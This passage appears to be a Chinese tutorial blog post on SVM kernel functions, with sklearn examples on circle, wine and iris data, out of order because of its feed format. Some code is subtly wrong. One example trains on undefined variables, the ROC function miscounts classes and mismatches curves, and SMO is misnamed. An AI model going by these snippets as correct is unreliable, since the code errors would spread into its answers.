    plt.yticks(())
    # contour 和 contourf 都是画三维等高线图的,不同点在于 contour() 是绘制轮廓线,contourf()会填充轮廓。
    plt.contourf(xx, yy, label_predict, alpha=0.5) # 用 contourf()函数为坐标矩阵中不同类别填充不同颜色
    markers = ['x', '^', 'o']
    colors = ['b', 'r', 'c'] # 蓝, 红, 青
    # 对于一维数组或者列表,unique 函数去除其中重复的元素,
    # 并按元素由大到小返回一个新的无元素重复的元组或者列表
    classes = np.unique(y)
    # 画出每一类数据的散点图
    for label in classes:
    plt.scatter(X[y == label][:, 0], X[y == label][:, 1],
    c=colors[label], s=60, marker=markers[label])
    # 标记出支持向量,将两类支持向量机用不同颜色表示出来
    if draw_SV:
    SV = model.support_vectors_ # 获取支持向量
    n = model.n_support_[0] # 第一类支持向量个数
    plt.scatter(SV[:n, 0],SV[:n, 1], s=15, c='black', marker='o')
    plt.scatter(SV[n:, 0],SV[n:, 1], s=15, c='g', marker='o')
    (3) 生成模拟分类数据集,并画出数据集
    """
    make_circles:
    n_samples:int,optional(默认值= 100)
    生成的总点数。如果是奇数,则内圆将比外圆具有一个点。
    shuffle:bool,optional(默认值= True)
    是否洗牌样品。
    noise:双倍或无(默认=无)
    高斯噪声的标准偏差加到数据上。
    random_state:int,RandomState 实例或 None(默认)
    确定数据集重排和噪声的随机数生成。传递一个 int,用于跨多个函数调用的可重现输出。见术语表。
    factor:0 < double < 1(默认值= .8)
    内圈和外圈之间的比例因子。
    """
    X, y = make_circles(200,factor=0.1,noise=0.1) # 产生样本点
    plt.scatter(X[y == 0, 0], X[y == 0, 1], c='b', s=20, marker = 'x') # 第一类
    plt.scatter(X[y == 1, 0], X[y == 1, 1], c='r', s=20, marker = '^') # 第二类
    plt.xticks(())
    plt.yticks(())
    plt.title('数据集')
    plt.show() # 画出数据集

    png

    (4) 通过调用 SVM 函数, 分别构造线性核函数和三阶多项式核函数 SVM, 把运算的结果用图形描绘出来
    plt.figure(figsize=(12, 10), dpi=200)
    # 使用线性核函数进行分类
    model_linear = SVC(C=1.0, kernel='linear') # 实例化,设置的核函数为线性核函数
    model_linear.fit(X, y) # 用训练集数据训练模型,和上一句配合使用

    # 画出使用线性核函数的分类边界
    plt.subplot(2, 2, 1)
    plot_decision_boundary(model_linear, X, y, title='线性核函数') # 调用画图函数
    print("采用线性核函数生成的支持向量个数:", model_linear.n_support_)

    # 使用多项式核函数进行分类
    model_poly = SVC(C=1.0, kernel='poly', degree=3, gamma="auto") # 实例化,设置的核函数为多项式核函数
    model_poly.fit(X, y) # 用训练集数据训练模型
    # 画出使用多项式核函数的分类边界
    plt.subplot(2, 2, 2)
    plot_decision_boundary(model_poly, X, y, title='多项式核函数') # 调用画图函数
    print("采用多项式函数生成的支持向量个数:", model_poly.n_support_)
    plt.show()
    采用线性核函数生成的支持向量个数:[100 100]采用多项式函数生成的支持向量个数:[100 100]

    png

    (5) 通过调用 SVC(), 分别构造 4 个高斯径向基核函数的 SVM, 对应的分别为 10, 1, 0.1, 0.01, 把运算的结果用图形描绘出来
    plt.figure(figsize=(12, 10), dpi=200)
    # enumerate() 函数用于将一个可遍历的数据对象(如列表、元组或字符串)组合为一个索引序列,
    # 同时列出数据和数据下标,一般用在 for 循环当中。
    for j, gamma in enumerate((10, 1, 0.1, 0.01)):
    plt.subplot(2, 2, j+1)
    model_rtf= SVC(C=1.0, kernel='rbf', gamma=gamma)
    model_rtf.fit(X,y) # 高斯核函数
    #调用画图函数
    plot_decision_boundary(model_rtf, X, y, title='rbf 函数,'
    '参数 gamma='+str(gamma))
    print("rbf 函数,参数 gamma=",str(gamma),"支持向量个数:",model_rtf.n_support_)
    plt.show()
    rbf 函数,参数 gamma= 10 支持向量个数:[30  7]rbf 函数,参数 gamma= 1 支持向量个数:[9 8]rbf 函数,参数 gamma= 0.1 支持向量个数:[96 96]rbf 函数,参数 gamma= 0.01 支持向量个数:[100 100]

    png

    (6) 引申
    from sklearn.model_selection import GridSearchCV

    tuned_parameters = [{'kernel': ['rbf'], 'gamma': [1, 0.1, 0.01],'C': [0.1, 1, 10]},
    {'kernel': ['linear'], 'C': [0.1, 1, 10]},
    {'kernel': ['poly'],'gamma': [1, 0.1, 0.01],
    'C': [0.1, 1, 10]}]
    """
    GridSearchCV()函数能实现自动调参, 把参数输进去, 就能给出最优的结果和参数
    https://blog.csdn.net/weixin_41988628/article/details/83098130
    """
    model_grid = GridSearchCV(SVC(), tuned_parameters, cv=5)
    model_grid.fit(X, y)
    print("The best parameters are %s with a score of %0.2f"
    % (model_grid.best_params_, model_grid.best_score_))
    The best parameters are {'C': 0.1, 'gamma': 1, 'kernel': 'rbf'} with a score of 1.00

    10.8 综合实例——利用 SVM 构建分类问题

    准备工作: 导入需要的模块

    import numpy as np
    from sklearn import svm
    from sklearn.svm import SVC # 导入 SVM 模型
    from sklearn.model_selection import train_test_split # 导入测试库
    from sklearn.datasets import load_wine # 导入 wine 数据集
    from time import time

    (1)导入数据集

    要将数据转换为 SVM 支持的数据格式: [ 1 类别标号 ] [ 特征 1 ] : [ 特征值 ] [ 特征 2 ] : [ 特征值 ]…

    sklearn 自带经典的 wine 数据集, 通过 load_wine()函数导入

    wine 数据集: https://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_wine.html

    属性
    3
    每类样品[59,71,48]
    样品总数178
    维度13
    wine = load_wine()
    wine_data = wine.data
    wine_label = wine.target
    wine_data, wine_label
    (array([[1.423e+01, 1.710e+00, 2.430e+00, ..., 1.040e+00, 3.920e+00,         1.065e+03],        [1.320e+01, 1.780e+00, 2.140e+00, ..., 1.050e+00, 3.400e+00,         1.050e+03],        [1.316e+01, 2.360e+00, 2.670e+00, ..., 1.030e+00, 3.170e+00,         1.185e+03],        ...,        [1.327e+01, 4.280e+00, 2.260e+00, ..., 5.900e-01, 1.560e+00,         8.350e+02],        [1.317e+01, 2.590e+00, 2.370e+00, ..., 6.000e-01, 1.620e+00,         8.400e+02],        [1.413e+01, 4.100e+00, 2.740e+00, ..., 6.100e-01, 1.600e+00,         5.600e+02]]), array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1,        1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,        1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,        1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2,        2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,        2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,        2, 2]))

    (2) 数据预处理

    使用数据预处理中标准化类 StandardScaler 对数据进行标准化, 以避免数据存在严重的量纲不一致的问题

    数据的标准化(normalization)是将数据按比例缩放,使之落入一个小的特定区间。在某些比较和评价的指标处理中经常会用到,去除数据的单位限制,将其转化为无量纲的纯数值,便于不同单位或量级的指标能够进行比较和加权。

    from sklearn.preprocessing import StandardScaler

    wine_data = StandardScaler().fit_transform(wine_data) # 对数据进行标准化
    wine_data
    array([[ 1.51861254, -0.5622498 ,  0.23205254, ...,  0.36217728,         1.84791957,  1.01300893],       [ 0.24628963, -0.49941338, -0.82799632, ...,  0.40605066,         1.1134493 ,  0.96524152],       [ 0.19687903,  0.02123125,  1.10933436, ...,  0.31830389,         0.78858745,  1.39514818],       ...,       [ 0.33275817,  1.74474449, -0.38935541, ..., -1.61212515,        -1.48544548,  0.28057537],       [ 0.20923168,  0.22769377,  0.01273209, ..., -1.56825176,        -1.40069891,  0.29649784],       [ 1.39508604,  1.58316512,  1.36520822, ..., -1.52437837,        -1.42894777, -0.59516041]])

    (3) 分离数据

    将数据划分为训练集和测试集, 训练集: 测试集 = 80%: 20%

    sklearn 的 train_test_split()各函数参数含义解释(非常全)

    wine_train, wine_test, wine_train_label, wine_test_label = \
    train_test_split(wine_data, wine_label, test_size=0.2, random_state=100)

    (4) 以默认的 SVM 参数, 对训练数据集进行训练, 产生训练模型(以默认的 rbf 为例)

    time0 = time()
    model = SVC()
    model.fit(wine_train, wine_train_label)
    time1 = time()

    (5) 结果及分析

    def result_show_analyse(test,test_label):
    """
    预测结果并进行分析
    """
    from datetime import datetime

    # 1、预测结果
    print("---------测试集的结果--------")
    test_pred = model.predict(test)
    print("测试集的真实结果为:\n", test_label)
    print("测试集的预测结果为:\n", test_pred)
    # 求出预测和真实一样的数目
    true = np.sum(test_pred == test_label)
    print("预测对的结果数目为:", true)
    print("预测错的结果数目为:", test_label.shape[0] - true)
    print("训练时间:", datetime.fromtimestamp(time1-time0).strftime("%M:%S:%f"))
    # 2、结果分析,给出准确率、精确率、召回率、F1 值、Cohen’s Kappa 系数
    print("---------测试集的结果分析--------")
    print("使用 SVM 预测 wine 数据的准确率是:%f"
    % (accuracy_score(test_label, test_pred)))
    print("使用 SVM 预测 wine 数据的精确率是:%f"
    % (precision_score(test_label, test_pred, average="macro")))
    # 对多分类要加 average="macro"
    print("使用 SVM 预测 wine 数据的召回率是:%f"
    % (recall_score(test_label, test_pred, average="macro")))
    print("使用 SVM 预测 wine 数据的 F1 值是:%f"
    % (f1_score(test_label, test_pred, average="macro")))
    print("使用 SVM 预测 wine 数据的 Cohen’s Kappa 系数是:%f"
    % (cohen_kappa_score(test_label, test_pred)))
    print("使用 SVM 预测 wine 数据的分类报告为:\n",
    classification_report(test_label, test_pred))
    # 3、画出预测结果和真实结果对比的图
    print("---------测试集的结果图--------")
    plt.plot(test_pred,'bo', label="预测")
    plt.plot(test_label,'r*', label="真实")
    plt.xlabel(r'测试集样本',color='r', fontsize=18)
    plt.ylabel(r'类别标签',color='r', fontsize=18, rotation=360)
    plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
    plt.title('测试集的实际分类和预测分类图', fontsize=18)
    plt.show()


    # 调用结果函数
    # 调用相关库
    from sklearn.metrics import accuracy_score,precision_score, \
    recall_score,f1_score,cohen_kappa_score
    from sklearn.metrics import classification_report
    import matplotlib.pyplot as plt

    # 图表中显示中文
    from pylab import *

    mpl.rcParams['font.sans-serif'] = ['SimHei']
    mpl.rcParams['axes.unicode_minus'] = False
    result_show_analyse(wine_test,wine_test_label) # 调用结果模块
    ---------测试集的结果--------测试集的真实结果为: [1 2 0 1 2 2 1 1 1 1 2 1 2 2 2 0 2 0 1 0 2 0 1 1 0 0 1 1 1 2 2 1 0 1 2 2]测试集的预测结果为: [1 2 0 1 1 2 1 1 1 1 2 1 2 2 2 0 2 0 1 0 2 0 1 1 0 0 1 1 1 2 2 1 0 1 2 2]预测对的结果数目为:35预测错的结果数目为:1训练时间:00:00:003162---------测试集的结果分析--------使用 SVM 预测 wine 数据的准确率是:0.972222使用 SVM 预测 wine 数据的精确率是:0.979167使用 SVM 预测 wine 数据的召回率是:0.974359使用 SVM 预测 wine 数据的 F1 值是:0.975914使用 SVM 预测 wine 数据的 Cohen’s Kappa 系数是:0.956938使用 SVM 预测 wine 数据的分类报告为:               precision    recall  f1-score   support           0       1.00      1.00      1.00         8           1       0.94      1.00      0.97        15           2       1.00      0.92      0.96        13    accuracy                           0.97        36   macro avg       0.98      0.97      0.98        36weighted avg       0.97      0.97      0.97        36---------测试集的结果图--------

    png

    【Sklearn】sklearn.metrics 中的评估方法

    通常以关注的类为正类,其他类为负类。分类器在测试数据集上预测要么正确要么不正确。4 种情况出现的总数分别记作:

    名称说明
    tp(true positive)将正类预测为正类
    fn(false negative)将正类预测为负类
    fp(false positive)将负类预测为正类
    tn(true negative)将负类预测为负类

    分类 0 混淆矩阵:

    预测属于分类 0预测不属于分类 0
    实际属于分类 0tp = 8fn = 0
    实际不属于分类 0fp = 0tn = 28
    precisionrecallf1-score
    $P=\frac{tp}{tp+fp}=1$$R=\frac{tp}{tp+fn}=1$$\frac{2PR}{P+R}=1$

    分类 1 混淆矩阵:

    预测属于分类 1预测不属于分类 1
    实际属于分类 1tp = 15fn = 0
    实际不属于分类 1fp = 1tn = 20
    precisionrecallf1-score
    $P=\frac{tp}{tp+fp}=\frac{15}{16}=0.9375$$R=\frac{tp}{tp+fn}=1$$\frac{2PR}{P+R}=\frac{30}{31}=0.9677$

    分类 2 混淆矩阵:

    预测属于分类 2预测不属于分类 2
    实际属于分类 2tp = 12fn = 1
    实际不属于分类 2fp = 0tn = 23
    precisionrecallf1-score
    $P=\frac{tp}{tp+fp}=1$$R=\frac{tp}{tp+fn}=\frac{12}{13}=0.923$$\frac{2PR}{P+R}=\frac{24}{25}=0.96$

    (6) 分类结果的混淆矩阵及图表显示

    from sklearn import metrics


    def cm_plot(y,yp):
    conf_mx = metrics.confusion_matrix(y, yp) # 模型对于测试集的混淆矩阵
    print("测试集的混淆矩阵:\n",conf_mx)
    # 画混淆矩阵图,配色风格使用 cm.Greens
    # (太丑了, 我要用 Oranges, https://blog.csdn.net/weixin_51111267/article/details/122605388)
    plt.matshow(conf_mx,cmap=plt.cm.Oranges)
    plt.colorbar()# 颜色标签
    for x in range(len(conf_mx)):
    for y in range(len(conf_mx)):
    plt.annotate(conf_mx[x,y],xy=(x,y),horizontalalignment='center',
    verticalalignment='center')
    plt.ylabel('True label')# 坐标轴标签
    plt.xlabel('Predicted label')# 坐标轴标签
    return plt


    wine_test_pred=model.predict(wine_test)
    cm_plot(wine_test_label, wine_test_pred).show()
    测试集的混淆矩阵: [[ 8  0  0] [ 0 15  0] [ 0  1 12]]

    png

    10.9 高手点拨

    10.9.1 SMO 算法

    SVM 对应的优化算法, 以牺牲精度换取时间

    Sequential Minimal Optimism

    序列 最小 最优化 算法

    10.9.3 核函数的选取

    对于高斯径向基核函数, 可以通过求准确率, 画学习曲线来调整 gamma 值

    #取不同 gamma 值得到的准确率
    score = []
    gamma_range = np.logspace(-10, 1, 50) # 得到不同的 gamma 值即对数刻度上均匀间隔的数
    for i in gamma_range:
    model = SVC(kernel="rbf",gamma = i, cache_size=5000)
    model.fit(wine_train, wine_train_label)
    score_gamma = model.score(wine_test, wine_test_label)
    score.append(score_gamma)
    print("最大的准确率为:",max(score))
    print("对应的 gamma 值", gamma_range[score.index(max(score))])
    plt.xlabel("gamma 取值")
    plt.ylabel("准确率")
    plt.title("gamma 的学习曲线")
    plt.plot(gamma_range,score)
    plt.show()
    最大的准确率为:1.0对应的 gamma 值 0.020235896477251554

    png

    10.9.4 多分类 ROC 曲线的绘制

    【小学生都会的机器学习】一个视频帮各位总结好了混淆矩阵、召回率、精准率、ROC 等…

    ROC 曲线绘制原理及如何用 SPSS 绘制 ROC 曲线

    ROC 曲线越接近左上角, 代表模型性能越好

    from itertools import cycle
    from sklearn.metrics import roc_curve, auc
    from sklearn.model_selection import train_test_split
    from sklearn.preprocessing import label_binarize
    from numpy import interp


    def plot_roc(test, test_label, test_pred):
    """
    :param test: 测试样本的数据
    :param test_label: 测试样本的标签
    :param test_pred: 测试样本的预测值
    """
    class_num = sum(unique(test_label)) # 类别数
    Y_pred = test_pred
    # 对输出进行二值化
    # Y_label 样例真实标签,Y_pred 学习器预测的标签
    Y_label = label_binarize(test_label, classes=[i for i in range(class_num)])
    Y_pred = label_binarize(Y_pred, classes=[i for i in range(class_num)])
    # 计算每一类的 ROC
    # dict() 用于创建一个字典
    fpr = dict() # 假正例率(False Positive Rate , FPR)
    tpr = dict() # 真正例率(True Positive Rate , TPR)
    roc_auc = dict() # ROC 曲线下方的面积
    for i in range(class_num):
    fpr[i], tpr[i], _ = roc_curve(Y_label[:, i], Y_pred[:, i])
    roc_auc[i] = auc(fpr[i], tpr[i])
    # 计算 micro-average ROC 曲线和 ROC 面积
    fpr["micro"], tpr["micro"], _ = roc_curve(Y_label.ravel(), Y_pred.ravel())
    roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])

    # 计算 macro-average ROC 曲线 and ROC 面积
    # 第一步:汇总所有误报率 aggregate all false positive rates
    all_fpr = np.unique(np.concatenate([fpr[i] for i in range(class_num)]))

    # 第二步:在此点插值所有 ROC 曲线 interpolate all ROC curves at this points
    mean_tpr = np.zeros_like(all_fpr)
    for i in range(class_num):
    mean_tpr += interp(all_fpr, fpr[i], tpr[i])
    # 第三步:最后对其进行平均并计算 AUC Finally average it and compute AUC
    mean_tpr /= class_num
    fpr["macro"] = all_fpr
    tpr["macro"] = mean_tpr
    roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
    # 画出具体的某一类的 ROC 曲线,如第一类
    plt.figure()
    lw = 2
    plt.plot(fpr[1], tpr[2], color="darkorange",
    lw=lw, label="ROC curve (area = %0.2f)" % roc_auc[1])
    plt.plot([0, 1], [0, 1], color="navy", lw=lw, linestyle="--")
    plt.xlim([0.0, 1.0])
    plt.ylim([0.0, 1.05])
    plt.xlabel("假正例率 False Positive Rate(FPR)")
    plt.ylabel("真正例率 True Positive Rate(TPR)")
    plt.title("Receiver operating characteristic example")
    plt.legend(loc="lower right")
    plt.show()

    # 画出所有类的 ROC 曲线
    lw = 2 # line width
    plt.figure()
    plt.plot(fpr["micro"], tpr["micro"],
    label="micro-average ROC 曲线 (area = {0:0.2f})"
    "".format(roc_auc["micro"]),
    color="deeppink", linestyle=":", linewidth=4)

    plt.plot(fpr["macro"], tpr["macro"],
    label="macro-average ROC 曲线 (area = {0:0.2f})"
    "".format(roc_auc["macro"]),
    color="navy", linestyle=":", linewidth=4)
    colors = cycle(["aqua", "darkorange", "cornflowerblue"])
    for i, color in zip(range(class_num), colors):
    plt.plot(fpr[i], tpr[i], color=color, lw=lw,
    label="ROC curve of class {0} (area = {1:0.2f})"
    "".format(i, roc_auc[i]))

    plt.plot([0, 1], [0, 1], "k--", lw=lw)
    plt.xlim([0.0, 1.0])
    plt.ylim([0.0, 1.05])
    plt.xlabel("假正例率 False Positive Rate(FPR)")
    plt.ylabel("真正例率 True Positive Rate(TPR)")
    plt.title('Some extension of Receiver operating characteristic'
    'to multi-class')
    plt.legend(loc="lower right")
    plt.show()


    # 调用画 ROC 曲线的函数
    model = SVC() # 实例化,设置模型参数
    model.fit(wine_train, wine_train_label)
    wine_test_pred = model.predict(wine_test)
    plot_roc(wine_test, wine_test_label, wine_test_pred)

    png

    png

    10.10 习题 构建基于 iris 数据集的 SVM 分类模型

    https://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_iris.html

    import numpy as np
    from sklearn import svm
    from sklearn.svm import SVC
    from sklearn.model_selection import train_test_split
    from sklearn.datasets import load_iris
    from sklearn.preprocessing import StandardScaler
    from sklearn.metrics import classification_report
    import matplotlib.pyplot as plt
    import matplotlib as mpl
    from time import time

    # (1) 读取数据集, 区分标签和数据
    iris = load_iris()
    iris_data = iris.data
    iris_label = iris.target
    # (2) 标准化数据集
    iris_data = StandardScaler().fit_transform(iris_data)
    # (3) 将数据集划分为训练集和测试集
    iris_train, iris_test, iris_train_label, iris_test_label = \
    train_test_split(iris_data, iris_label, test_size=0.2)
    # (4) 构建 SVM 模型
    model = SVC()
    model.fit(iris_train, iris_train_label)
    iris_test_pred = model.predict(iris_test)
    # (5) 输出预测测试集结果, 评价分类模型性能, 输出测试报告
    print(classification_report(iris_test_label, iris_test_pred))
    mpl.rcParams['font.sans-serif'] = ['SimHei']
    mpl.rcParams['axes.unicode_minus'] = False
    print("---------测试集的结果图--------")
    plt.plot(iris_test_pred,'bo', label="预测")
    plt.plot(iris_test_label,'r*', label="真实")
    plt.xlabel(r'测试集样本',color='r', fontsize=18)
    plt.ylabel(r'类别标签',color='r', fontsize=18, rotation=360)
    plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
    plt.title('测试集的实际分类和预测分类图', fontsize=18)
    plt.show()
                  precision    recall  f1-score   support           0       1.00      1.00      1.00         9           1       0.92      0.92      0.92        13           2       0.88      0.88      0.88         8    accuracy                           0.93        30   macro avg       0.93      0.93      0.93        30weighted avg       0.93      0.93      0.93        30---------测试集的结果图--------

    png

    ]]>
    + 正文

    10 数据的空间变换——核函数变换

    10.1 相关知识简介

    10.1.1 超平面

    超平面(Hyper Plane)的本质是自由度比所在空间的维度小 1,也就是(n-1)维度

    n 维空间$F^n$中超平面表示为$a _ 1 x _ 1 + … + a _ n x _n =b$定义的子集, 其中$a _ 1,…,a _ n \in F$是不全为零的常数

    也可表示为$\mathbf{w\cdot x}+b=0$, 其中$\mathbf{w}$与$\mathbf{x}$是 n 维列向量, $\mathbf{w}=[w _ 1,w _ 2,…,w _ n]^T,\mathbf{x}=[x _ 1,x _ 2,…,x _ n]^T$

    • $\mathbf{w}$既可以看作超平面的法向量, 也可以看作是参数, 决定了超平面的方向

    • $\mathbf{x}$为超平面上的点

    • $b$是一个实数, 代表超平面到原点的距离

    • $\mathbf{w\cdot x}$表示向量$\mathbf{w}$与$\mathbf{x}$的内积, 结果为一个标量

    • 向量的内积可以转换为矩阵的乘积, 所以$\mathbf{w\cdot x}=\mathbf{w}^T\mathbf{x}, \mathbf{w}^T$表示$\mathbf{w}$的转置

    • 超平面将空间划分为 3 部分, 即超平面本身$\mathbf{w\cdot x}+b=0$, 超平面上部$\mathbf{w\cdot x}+b>0$, 超平面下部$\mathbf{w\cdot x}+b<0$

    10.1.2 线性分类

    若一个分类超平面可以将两类样本完全分开, 则称这些样本是"线性可分"的, 椭圆在二维空间内不是分类超平面(不是一维), 不是线性可分的

    10.1.3 升维

    把样本从原输入低维空间向高维特征空间作映射,使得数据的维度增大

    非线性可分问题可以通过升维, 找到合适的映射函数将低维的向量$\mathbf{x}$变换为高维的向量$\mathbf{x}‘$, 然后在高维空间中,求向量$\mathbf{x’}$与向量$\mathbf{w}$的内积, 再与 b 相加, 得到分类超平面以及线性模型, 从而进行分类或回归, 使低维输入空间非线性可分问题变为高维特征空间的线性可分

    10.2 核函数的引入

    10.3.1 核函数定义

    设$\chi$是输入空间(欧氏空间或离散集合), H 为特征空间(希尔伯特空间, (可以直接理解成更高维的空间?)), 若存在一个从$\chi$到 H 的映射,$f(\mathbf{x}):\chi \to H$,使得对所有的$\mathbf{x},\mathbf{y}\in \chi$函数$K(\mathbf{x},\mathbf{y})=f(\mathbf{x})\cdot f(\mathbf{y})$, 则称$K(\mathbf{x}, \mathbf{y})$为核函数

    任何半正定($\ge 0$)的函数都可以作为核函数

    10.3.3 核函数的特点

    • 在原空间进行计算, 避免"维数灾难", 大大减小计算量, 有效处理高维输入

    10.4 常用核函数

    名称说明
    线性核函数对数据不进行任何变换, 不需要设置任何参数, 速度快, 用于线性可分, 适用于维度很大、样本数量差不多的数据集, 也可手动升维, 再使用线性核函数
    多项式核函数偏线性, 非常适合用于图像处理, 可调节参数获得好的结果
    高斯径向基核函数偏非线性, 适用范围较广, 是 SVM 的默认核函数, 适用于维度较低和样本数量一般的数据集

    10.4.1 线性核函数

    $$K(\mathbf{x},\mathbf{y})=\mathbf{x}\cdot \mathbf{y}$$

    线性核函数是最简单的核函数, 此时的映射函数为$f(\mathbf{z})=z$

    10.4.2 多项式核函数

    $$K(\mathbf{x},\mathbf{y})=\left [ \gamma (\mathbf{x}\cdot \mathbf{y})+c \right ]^d$$

    • $\gamma > 0$, 一般等于 1 /类别数, 表示对内积$(\mathbf{x}\cdot \mathbf{y})$进行放缩

    • c 代表常数项, c>0 时称为非齐次多项式

    • d 代表项式的阶次, 一般设 d=2, 若 d 取值过高, 学习的复杂性也会过高, 容易出现过拟合的现象.

    • 多项式核函数对应的映射后的特征维度为$C ^d _ {n+d}$, n 为$\mathbf{x}$的维度

    常用的多项式核函数

    $K(\mathbf{x},\mathbf{y})=\left [ \gamma (\mathbf{x}\cdot \mathbf{y})+1 \right ]^2$

    $K(\mathbf{x},\mathbf{y})=\left [ (\mathbf{x}\cdot \mathbf{y})+1\right ]2=(\Sigman _ {i=1}\mathbf{x} _ i \mathbf{y} _ i + 1)^2$

    $={\color{Red}{\Sigma^n _ {i=1} \mathbf{x}^2 _ i \mathbf{y}^2 _ i}} + {\color{Blue}{\Sigma^n _ {i=2}\Sigma^{i-1} _ {j=1}(\sqrt 2 \mathbf{x} _ i\mathbf{x} _ j)(\sqrt 2 \mathbf{y} _ i\mathbf{y} _ j)}}+ {\color{Green}{\Sigma^n _ {i=1}(\sqrt 2 \mathbf{x} _ i)(\sqrt 2 \mathbf{y} _ i)}} + {\color{Purple}1}$

    所以$f(\mathbf{z})=\left[{\color{Red}{z^2 _ n}}, {\color{Blue}{z^2 _ {n-1},…,z^2 _ 1, \sqrt 2 z _ n z _ {n-1},…,\sqrt 2 z _2 z _1, \sqrt 2z _n}}{\color{Green}{,\sqrt 2z _ {n-1}}}{\color{Purple}{,1}}\right]$

    使用该函数, 设向量$\mathbf{X}=[1, 2, 3, 4], \mathbf{Y}=[5, 6, 7, 8]$,原输入空间的维度为 4, 通过映射后特征维度将达到$C ^4 _ {4+2}=15$, 验证$K(\mathbf{x},\mathbf{y})=f(\mathbf{x})\cdot f(\mathbf{y})$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    import numpy as np


    def f(Z):
    """
    映射函数, 时间复杂度 O(n^2)?
    """
    Z1 = Z ** 2
    Z_shape = np.shape(Z)[1] - 1
    Z0 = []
    for i in range(Z_shape, 0, -1):
    for j in range(i - 1, -1, -1):
    xy = Z[0, i] * Z[0, j] * 2 ** 0.5
    Z0.append(xy)
    Z2 = np.array(Z0).reshape(1, -1)
    Z3 = Z * 2 ** 0.5
    return np.hstack((Z1 ,Z2, Z3, [[1]]))


    X = np.array([[1,2,3,4]]) # 4 维行向量
    Y = np.array([[5,6,7,8]])
    # 使用多项式核函数计算
    XY_poly = (X.dot(Y.T) + 1) ** 2
    print("使用多项式核函数计算的结果为:", XY_poly)
    # 使用映射的计算
    X1 = f(X)
    Y1 = f(Y)
    print("使用映射计算的结果为:", X1.dot(Y1.T))
    print("输出 X 的映射值为:\n",X1)
    print("输出 Y 的映射值为:\n",Y1)
    print("原输入空间的维度为:", np.shape(X)[1])
    print("映射后特征空间的维度为:", np.shape(X1)[1])
    使用多项式核函数计算的结果为:[[5041]]使用映射计算的结果为:[[5041.]]输出 X 的映射值为: [[ 1.          4.          9.         16.         16.97056275 11.3137085   5.65685425  8.48528137  4.24264069  2.82842712  1.41421356  2.82842712   4.24264069  5.65685425  1.        ]]输出 Y 的映射值为: [[25.         36.         49.         64.         79.19595949 67.88225099  56.56854249 59.39696962 49.49747468 42.42640687  7.07106781  8.48528137   9.89949494 11.3137085   1.        ]]原输入空间的维度为:4映射后特征空间的维度为:15

    10.4.3 高斯径向基核函数

    $$K(\mathbf{x},\mathbf{y})=e^{(-\frac{\left |\mathbf{x}-\mathbf{y}\right | 2}{2\sigma2})}$$

    此时映射函数映射之后是无穷维的

    10.6 SVM 原理

    SVM = Support Vector Machine 是支持向量

    SVC = Support Vector Classification 就是支持向量机用于分类

    SVR = Support Vector Regression.就是支持向量机用于回归分析

    参考: python 机器学习 | SVM 算法介绍及实现

    10.6.7 线性可分 SVM 的实现

    给定训练数据集, 其正例点是$x _ 1 = (4, 3),x _ 2 = (3, 3)$,负例点是$x _ 3 = (1, 1)$, 利用 sklearn 中的 SVC 库, 求出支持向量机, 支持向量机的个数、参数, 并对点$(4, 5)$、$(0, 0)$和$(1, 3)$进行预测.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    import numpy as np
    from sklearn.svm import SVC # 导入 SVC 模型
    import matplotlib.pyplot as plt
    import matplotlib as mpl

    # 导入数据
    train_x = np.array([[4, 3], [3, 3], [1, 1]])
    train_y = np.array([1, 1, -1]) # 写出对应的类别
    print("训练集(最右一列为标签):\n", np.hstack((x, y.reshape(3, 1))))

    # 调用 SVC, 训练算法
    model = SVC(kernel="linear") # 实例化, 设置的核函数为线性核函数
    model.fit(x, y) # 用训练集数据训练模型, 和上一句配合使用

    # 预测数据
    test_x = np.array([[4, 5], [0, 0], [1, 3]])
    test_y = model.predict(test_x)
    print("预测数据[4, 5], [0, 0], [1, 3]的类型值分别是", test_y)

    # 相关方法和返回值
    w = model.coef_[0] # 获取 w
    a = -w[0] / w[1] # 斜率
    b = model.intercept_
    print("支持向量:\n",model.support_vectors_) # 打印支持向量
    print("支持向量的标号:",model.support_) # 打印支持向量的标号
    print("每类支持向量的个数:",model.n_support_) # 每类支持向量的个数
    print("数据集 X 到分类超平面的距离:",model.decision_function(x))
    print("参数(法向量)w =", w)
    print("分类线的斜率 a =", a)
    print("分类平面截距 b:", b) # 超平面的截距值(常数值)。
    print("系数",model.coef_) # 每个特征系数(重要性),只有 LinearSVC 核函数可用
    print("超平面方程为{}x + {}y {} = 0".format(w[0], w[1], b[0]))

    # 绘图
    mpl.rcParams["font.sans-serif"] = ["Microsoft YaHei"]
    mpl.rcParams['axes.unicode_minus'] = False
    plt.figure()
    plt.axis("equal")
    for i in range(0, len(train_x)):
    plt.scatter(train_x[i][0], train_x[i][1], color="red", marker=["x", "o"][int(train_y[i] * 0.5 + 0.5)])
    for i in range(0, len(test_x)):
